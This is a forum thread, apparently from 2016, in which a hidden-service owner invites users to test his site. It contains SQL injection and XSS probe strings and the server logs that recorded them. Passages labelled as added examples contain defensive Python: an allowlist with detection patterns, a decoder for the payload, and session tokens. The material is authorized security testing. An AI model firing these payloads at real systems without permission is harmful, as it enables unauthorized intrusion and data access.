Come mess with my hidden service
-
2016-10-17 at 4:44 AM UTC
It seems to me that you are vulnerable to some type of open redirect. See the link below, where you would obviously change the username and password to yours. It lands me on the index. Or maybe that's what's supposed to happen. I don't know. Just thought it was weird I could manipulate the URL like that and get a valid page.
http://jlp4t5i2pvwdvkx3.onion:8080/?...sword=password
Ran some basic XSS and SQLi as well. But if you really want me to have a go at it, let me use my fuzzers and intercepting proxies. -
2016-10-17 at 5:32 AM UTC
Was messing with some headers as well. Meh.
-
2016-10-17 at 5:53 AM UTC
It seems to me that you are vulnerable to some type of open redirect. See the link below, where you would obviously change the username and password to yours. It lands me on the index. Or maybe that's what's supposed to happen. I don't know. Just thought it was weird I could manipulate the URL like that and get a valid page.
http://jlp4t5i2pvwdvkx3.onion:8080/?...sword=password
This doesn't seem to work for me. It takes me to the login.
Ran some basic XSS and SQLi as well. But if you really want me to have a go at it, let me use my fuzzers and intercepting proxies.
Well I'm not sure how much it can really handle as far as load goes. It'd be interesting to find out though. Not right now though. Let me work on the small bugs.
Also, here is what one of my security logs looks like...
!!!Security: Wrong Param
!!!Requested: {accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-encoding=gzip, deflate, host=jlp4t5i2pvwdvkx3.onion:8080, http-client-ip=127.0.0.1, accept-language=en-US,en;q=0.5, dnt=1, remote-addr=127.0.0.1, user-agent=this is a test ua <img src=x onerror= alert(999999) >, connection=keep-alive}
!!!Requested: GET / topic=true&section=introductions&topicTitle=1%20-%20clickd%20link%20on%20reddit&username=Sophia&password=REMOVED&=&
{topicTitle=1 - clickd link on reddit, password=REMOVED, =, topic=true, username=Sophia, section=introductions}
..................../..\..................
....................\../..................
.....................\/...................
!!!Security: Wrong Param
!!!Requested: {accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-encoding=gzip, deflate, host=jlp4t5i2pvwdvkx3.onion:8080, http-client-ip=127.0.0.1, accept-language=en-US,en;q=0.5, dnt=1, remote-addr=127.0.0.1, user-agent=this is a test ua <img src=x onerror= alert(999999) >, connection=keep-alive}
!!!Requested: GET / topic=true&section=introductions&topicTitle=1%20-%20clickd%20link%20on%20reddit&username=Sophia&password=REMOVED&=1%20AND%20ASCII(LOWER(SUBSTRING((SELECT%20TOP%201%20name%20FROM%20sysobjects%20WHERE%20xtype=%27U%27),%201,%201)))%20%3E%20116&=INBOX&=CHAT&=SETTINGS&=ABOUT
{topicTitle=1 - clickd link on reddit, password=REMOVED, =ABOUT, topic=true, username=Sophia, section=introductions}
..................../..\..................
....................\../..................
.....................\/...................
!!!Security: Wrong Param
!!!Requested: {accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-encoding=gzip, deflate, host=jlp4t5i2pvwdvkx3.onion:8080, http-client-ip=127.0.0.1, accept-language=en-US,en;q=0.5, dnt=1, remote-addr=127.0.0.1, user-agent=this is a test ua <img src=x onerror= alert(999999) >, connection=keep-alive}
!!!Requested: GET / topic=true&section=introductions&topicTitle=1%20-%20clickd%20link%20on%20reddit&username=Sophia&password=REMOVED&=&
{topicTitle=1 - clickd link on reddit, password=REMOVED, =, topic=true, username=Sophia, section=introductions}
..................../..\..................
....................\../..................
.....................\/...................
!!!Security: Wrong Param
!!!Requested: {accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-encoding=gzip, deflate, host=jlp4t5i2pvwdvkx3.onion:8080, http-client-ip=127.0.0.1, accept-language=en-US,en;q=0.5, dnt=1, remote-addr=127.0.0.1, user-agent=this is a test ua <img src=x onerror= alert(999999) >, connection=keep-alive}
!!!Requested: GET / topic=true&section=introductions&topicTitle=1%20-%20clickd%20link%20on%20reddit&username=Sophia&password=REMOVED&=1%27%20AND%201=(SELECT%20COUNT(*)%20FROM%20tablenames);%20--&=INBOX&=CHAT&=SETTINGS&=ABOUT
{topicTitle=1 - clickd link on reddit, password=REMOVED, =ABOUT, topic=true, username=Sophia, section=introductions}
..................../..\..................
....................\../..................
.....................\/...................
I set it up so that any parameters that aren't part of the application will trigger an error response (or not ;) and so that I understand (hopefully) what's going on. Error reports are the same. -
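An added example, not the site's own code and not from either poster, of the check behind the "Wrong Param" entries above: every query parameter is compared against an allowlist, values that look like probes (in parameters and in headers such as the User-Agent) are flagged, and the password is redacted before the line is written. The sample requests are reconstructed from the logged ones with a placeholder password; the `KNOWN_PARAMS` set and the probe patterns are assumptions. It also keeps the empty-key pairs (`&=INBOX&=CHAT&=...`) as separate entries, because the dict form printed in the log keeps only the last one (`=ABOUT`) and so hides the injection string that was sent in the first.

```python
"""Added example, not the forum site's own code: the allowlist check behind the
"Wrong Param" entries above, with probe detection and password redaction.
The sample requests are reconstructed from the logged ones; the password value,
the KNOWN_PARAMS set and the probe patterns are assumptions for the example."""
import re
from urllib.parse import parse_qsl

# Parameters the application understands; anything else is a "Wrong Param".
KNOWN_PARAMS = {"topic", "section", "topicTitle", "username", "password"}
SECRET_PARAMS = {"password"}  # never written to the log in clear

XSS_PROBE = re.compile(r"<\s*\w+[^>]*\bon\w+\s*=", re.I)       # <img src=x onerror=...
SQLI_PROBE = re.compile(r"\b(select|union|sysobjects)\b|'\s*and\s+1\s*=", re.I)

# Constructed sample input: query strings and User-Agent taken from the log,
# with a placeholder password in place of the redacted one.
UA_PROBE = "this is a test ua <img src=x onerror= alert(999999) >"
BASE = ("topic=true&section=introductions&topicTitle=1%20-%20clickd%20link%20on%20reddit"
        "&username=Sophia&password=hunter2")
SAMPLES = [
    (BASE + "&=&", {"user-agent": UA_PROBE}),
    (BASE + "&=1%20AND%20ASCII(LOWER(SUBSTRING((SELECT%20TOP%201%20name%20FROM%20sysobjects"
            "%20WHERE%20xtype=%27U%27),%201,%201)))%20%3E%20116&=INBOX&=CHAT&=SETTINGS&=ABOUT",
     {"user-agent": UA_PROBE}),
    ("topic=true&section=introductions&username=Sophia&password=hunter2",
     {"user-agent": "Mozilla/5.0"}),
]


def check_request(query, headers):
    """Validate one GET request; returns the verdict and a redacted log line."""
    # keep_blank_values=True keeps pairs like `=INBOX` (empty key) and `=` as
    # separate entries instead of silently dropping them.
    pairs = parse_qsl(query, keep_blank_values=True)
    unknown = sorted({k for k, _ in pairs if k not in KNOWN_PARAMS})
    probes = [f"param {k!r}={v!r}" for k, v in pairs
              if XSS_PROBE.search(v) or SQLI_PROBE.search(v)]
    probes += [f"header {h}={v!r}" for h, v in headers.items() if XSS_PROBE.search(v)]
    redacted = [(k, "REMOVED" if k in SECRET_PARAMS else v) for k, v in pairs]
    ok = not unknown and not probes
    prefix = "" if ok else "!!!Security: Wrong Param "
    line = prefix + "GET / " + "&".join(f"{k}={v}" for k, v in redacted)
    return {"ok": ok, "unknown": unknown, "probes": probes, "pairs": pairs, "log": line}


def collapsed_view(pairs):
    """The dict form the original log prints. Repeated keys keep only the last
    value, so `=ABOUT` masks the injection string sent in the first empty key."""
    return dict(pairs)


def run_samples():
    return [check_request(q, h) for q, h in SAMPLES]


if __name__ == "__main__":
    for verdict in run_samples():
        print(verdict["log"])
        for probe in verdict["probes"]:
            print("    probe:", probe)
```

Running it prints one redacted line per sample request; the first two are rejected (an empty-key parameter, plus the `onerror=` User-Agent and the `SELECT ... sysobjects` value), the third passes. The list form returned in `pairs` is what to inspect when a request is rejected, not the collapsed dict.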
2016-10-17 at 8:09 AM UTC
This doesn't seem to work for me. It takes me to the login.
Well I'm not sure how much it can really handle as far as load goes. It'd be interesting to find out though. Not right now though. Let me work on the small bugs.
http://jlp4t5i2pvwdvkx3.onion:8080/?username=&password=submit=
Alright, so if you have the URL like this and the uname and pass are set, you should try to set the value of the submit parameter to a link to another section. When I did that, I landed on the index. I don't know about this kind of behavior, but in general with web apps, if you can add a URL to the value of some parameter and you land on the URL you added, you may have an open redirect or remote file inclusion vulnerability. So it might be worth checking out.
Also I am checking the submit parameter for SQLi vulns. What kind of backend are you running? I ran some heuristics that say MySQL but I don't think that is correct.
Also, if I take this string
CONCAT_WS(CHAR(32,58,32),user(),database(),version())
and convert it to MSSQL CHAR(), URL-encode the payload and execute it:
%20CHAR%2867%29%20%2b%20CHAR%2879%29%20%2b%20CHAR%2878%29%20%2b%20CHAR%2867%29%20%2b%20CHAR%2865%29%20%2b%20CHAR%2884%29%20%2b%20CHAR%2895%29%20%2b%20CHAR%2887%29%20%2b%20CHAR%2883%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2867%29%20%2b%20CHAR%2872%29%20%2b%20CHAR%2865%29%20%2b%20CHAR%2882%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2851%29%20%2b%20CHAR%2850%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%2853%29%20%2b%20CHAR%2856%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%2851%29%20%2b%20CHAR%2850%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%28117%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28101%29%20%2b%20CHAR%28114%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%28100%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%28116%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%2898%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28101%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%28118%29%20%2b%20CHAR%28101%29%20%2b%20CHAR%28114%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28105%29%20%2b%20CHAR%28111%29%20%2b%20CHAR%28110%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2841%29
The chatbox returns `1` for some reason.
It's also good to log all error messages like that. Also I will continue testing for a while if it pleases you. -
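An added example, not code from either poster: the string-to-CHAR() conversion described above, in both directions, applied to the posted payload. Decoding the payload shows exactly which text it carries; nothing about the site's backend is assumed.

```python
"""Added example, not from the original post: the conversion the poster
describes (a string rendered as an MSSQL CHAR() concatenation, then
URL-encoded) in both directions, applied to the posted payload."""
import re
from urllib.parse import quote, unquote

ORIGINAL = "CONCAT_WS(CHAR(32,58,32),user(),database(),version())"

# Copy of the payload quoted in the post, split only for readability.
POSTED = (
    "%20CHAR%2867%29%20%2b%20CHAR%2879%29%20%2b%20CHAR%2878%29%20%2b%20CHAR%2867%29"
    "%20%2b%20CHAR%2865%29%20%2b%20CHAR%2884%29%20%2b%20CHAR%2895%29%20%2b%20CHAR%2887%29"
    "%20%2b%20CHAR%2883%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2867%29%20%2b%20CHAR%2872%29"
    "%20%2b%20CHAR%2865%29%20%2b%20CHAR%2882%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2851%29"
    "%20%2b%20CHAR%2850%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%2853%29%20%2b%20CHAR%2856%29"
    "%20%2b%20CHAR%2844%29%20%2b%20CHAR%2851%29%20%2b%20CHAR%2850%29%20%2b%20CHAR%2841%29"
    "%20%2b%20CHAR%2844%29%20%2b%20CHAR%28117%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28101%29"
    "%20%2b%20CHAR%28114%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29"
    "%20%2b%20CHAR%28100%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%28116%29%20%2b%20CHAR%2897%29"
    "%20%2b%20CHAR%2898%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28101%29"
    "%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%28118%29"
    "%20%2b%20CHAR%28101%29%20%2b%20CHAR%28114%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28105%29"
    "%20%2b%20CHAR%28111%29%20%2b%20CHAR%28110%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29"
    "%20%2b%20CHAR%2841%29"
)


def to_mssql_char(s: str) -> str:
    """Render `s` as an MSSQL concatenation of CHAR() calls, one per character.
    On MSSQL this expression evaluates to the string `s` itself: it is a
    literal, so any function names inside `s` are text, not calls."""
    return " + ".join(f"CHAR({ord(c)})" for c in s)


def encode_payload(s: str) -> str:
    """URL-encode the CHAR() form for a query string (leading space as posted).
    quote() emits uppercase hex (%2B); the posted payload used lowercase (%2b)."""
    return quote(" " + to_mssql_char(s), safe="")


def from_mssql_char(payload: str) -> str:
    """Reverse it: URL-decode, then map every CHAR(n) back to its character."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", unquote(payload)))


if __name__ == "__main__":
    print(from_mssql_char(POSTED))
    print(encode_payload(ORIGINAL).lower() == POSTED.lower())
```

Decoding the posted payload gives back `CONCAT_WS(CHAR(32,58,32),user(),database(),version())` exactly, and that is the thing to notice: on MSSQL the CHAR() chain evaluates to that text as a string literal, so the database would not execute `user()`, `database()` or `version()` (which are MySQL functions in any case). A fingerprinting probe that means something to MSSQL uses its own expressions, for instance `@@VERSION`, `DB_NAME()` and `SYSTEM_USER`; that is a general fact about MSSQL, not something this thread established about the site.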
2016-10-18 at 6:30 AM UTC
http://jlp4t5i2pvwdvkx3.onion:8080/?username=&password=submit=
Technically, you're just logging in when you do this. Anytime you send a parameter with a key of 'password' AND a parameter with a key of 'username', you'll be logged in and returned to the index page. Eventually I may make session tokens or cookies (depending on the security for clients).
Also I am checking the submit parameter for SQLi vulns. What kind of backend are you running? I ran some heuristics that say MySQL but I don't think that is correct.
This I won't say yet (if I do).
Also, if I take this string
CONCAT_WS(CHAR(32,58,32),user(),database(),version())
and convert it to MSSQL CHAR(), URL-encode the payload and execute it:
%20CHAR%2867%29%20%2b%20CHAR%2879%29%20%2b%20CHAR%2878%29%20%2b%20CHAR%2867%29%20%2b%20CHAR%2865%29%20%2b%20CHAR%2884%29%20%2b%20CHAR%2895%29%20%2b%20CHAR%2887%29%20%2b%20CHAR%2883%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2867%29%20%2b%20CHAR%2872%29%20%2b%20CHAR%2865%29%20%2b%20CHAR%2882%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2851%29%20%2b%20CHAR%2850%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%2853%29%20%2b%20CHAR%2856%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%2851%29%20%2b%20CHAR%2850%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%28117%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28101%29%20%2b%20CHAR%28114%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%28100%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%28116%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%2898%29%20%2b%20CHAR%2897%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28101%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2844%29%20%2b%20CHAR%28118%29%20%2b%20CHAR%28101%29%20%2b%20CHAR%28114%29%20%2b%20CHAR%28115%29%20%2b%20CHAR%28105%29%20%2b%20CHAR%28111%29%20%2b%20CHAR%28110%29%20%2b%20CHAR%2840%29%20%2b%20CHAR%2841%29%20%2b%20CHAR%2841%29
The chatbox returns `1` for some reason.
This I am not sure about and I couldn't replicate it. Could you do it again sometime when we are both online at the same time?
It's also good to log all error messages like that. Also I will continue testing for a while if it pleases you.
Yes, please do. You can also PM me on that site with your progress. I'd like to give you more inside information over time to help you possibly find vulnerabilities. Thank you. -
2016-10-20 at 10:11 PM UTC
I will hit you up on there in a bit. I wish I could use zaproxy to intercept the traffic though, that would make fuzzing easier. In general zaproxy sits between me and the website I am connecting to as an HTTP proxy, it doesn't offer SOCKS support however. And chaining it through tor does literally nothing at all, which is gay af, because zaproxy is awesome for the most part.
-
2016-10-22 at 4:30 AM UTC
I will hit you up on there in a bit. I wish I could use zaproxy to intercept the traffic though, that would make fuzzing easier. In general zaproxy sits between me and the website I am connecting to as an HTTP proxy, it doesn't offer SOCKS support however. And chaining it through tor does literally nothing at all, which is gay af, because zaproxy is awesome for the most part.
I just moved to using OWASP ZAP from Burp Suite. I haven't been able to get it to work with Tor though. I got proxychains and it seemed to already come configured, but then Tor wouldn't work for some reason.
Also, I added a captcha and issue a UUID as a token rather than passing around the user's password. I'd like these tested. Do you know anyone else that would like to test my site? I'm actually considering putting up some servers with security hole(s) in them to allow people to hack, just to see if they can find the error. -
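An added example, not the site's own code, of what replacing the username/password pair with an issued token looks like in practice. It covers both points the site author raised: the earlier login that accepts `username` and `password` on every GET, and the UUID token now issued instead. The login checks a salted hash, issues a random opaque token with an expiry, resolves and revokes it, and builds the cookie header that keeps the token out of URLs, Referer headers and log lines. The user table, salt and TTL are constructed for the example.

```python
"""Added example, not the forum site's own code: session tokens that replace
resending username/password on every request. The user store, salt and TTL
are constructed for the example; a real server would keep them elsewhere."""
import hmac
import secrets
import time
from hashlib import pbkdf2_hmac

_SALT = b"constructed-salt-for-the-example"
TOKEN_TTL = 15 * 60  # seconds a token stays valid (assumed value)


def _hash(password):
    # Slow, salted hash: the clear-text password is never stored or logged.
    return pbkdf2_hmac("sha256", password.encode(), _SALT, 100_000)


USERS = {"Sophia": _hash("correct horse")}  # constructed sample user
_DUMMY = _hash("")                          # compared against for unknown users
SESSIONS = {}                               # token -> (username, expiry time)


def login(username, password, now=None):
    """Return a fresh token on success, else None. The same hashing work is
    done whether or not the user exists, so timing does not reveal usernames."""
    candidate = _hash(password)
    stored = USERS.get(username, _DUMMY)
    if username not in USERS or not hmac.compare_digest(stored, candidate):
        return None
    # An opaque 256-bit token from the CSPRNG. uuid4() is also random (122
    # bits); the point is that the token, not the password, travels.
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = (username, (time.time() if now is None else now) + TOKEN_TTL)
    return token


def user_for(token, now=None):
    """Resolve a token to its user. Unknown or expired tokens yield None; an
    expired one is removed so it cannot be reused."""
    entry = SESSIONS.get(token)
    if entry is None:
        return None
    username, expiry = entry
    if (time.time() if now is None else now) >= expiry:
        SESSIONS.pop(token, None)
        return None
    return username


def logout(token):
    SESSIONS.pop(token, None)


def set_cookie_header(token):
    """Carry the token in a cookie, not a query parameter: HttpOnly keeps it
    from page scripts, SameSite limits cross-site use, and it stays out of the
    URL that ends up in browser history, Referer headers and the server log.
    Add `Secure` when the site is served over TLS."""
    return (f"Set-Cookie: session={token}; HttpOnly; SameSite=Strict; "
            f"Path=/; Max-Age={TOKEN_TTL}")


if __name__ == "__main__":
    tok = login("Sophia", "correct horse")
    print(set_cookie_header(tok))
    print(user_for(tok))
```

The login itself should be a POST, so the credentials are in the body rather than in a query string that gets logged the way the "Wrong Param" lines above record every parameter. Whether the token is a UUID or `token_urlsafe` matters less than that it is unguessable, expires, can be revoked, and is the only thing the client resends.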
2016-10-22 at 4:38 AM UTC
I just moved to using OWASP ZAP from Burp Suite. I haven't been able to get it to work with Tor though. I got proxychains and it seemed to already come configured, but then Tor wouldn't work for some reason.
Also, I added a captcha and issue a UUID as a token rather than passing around the user's password. I'd like these tested. Do you know anyone else that would like to test my site? I'm actually considering putting up some servers with security hole(s) in them to allow people to hack, just to see if they can find the error.
Start proxychains with sudo, that should do the trick. And yeah, sure, would you like me to post your link to a couple of forums I frequent? -
2016-10-22 at 7:14 AM UTC
Start proxychains with sudo, that should do the trick. And yeah, sure, would you like me to post your link to a couple of forums I frequent?
Yes, please, but please convince them to actually alert me of any errors rather than vandalize. And no DoS or spamming. I'll make a special section of the forum for all of you that want to test for errors. PM me on the site and I'll either tell you how to access it or I'll make a special link for your accounts to access the area.
-
2016-10-31 at 12:39 AM UTC
Start proxychains with sudo, that should do the trick. And yeah, sure, would you like me to post your link to a couple of forums I frequent?
This doesn't seem to work. I set my Tor Browser up to use port 8181 as a proxy. I set ZAP to 8181. Both are on 127.0.0.1.
Then I set ZAP to use an outgoing proxy on port 9050 and set the last line in the proxychains config file to use port 9050.
My Tor Browser stops working completely and won't work again at all. It says "this browser won't work with Tor", but it is literally the Tor Browser Bundle. I have to unzip the original Tor Browser download and redo it all.
I've followed several tutorials but shit doesn't work.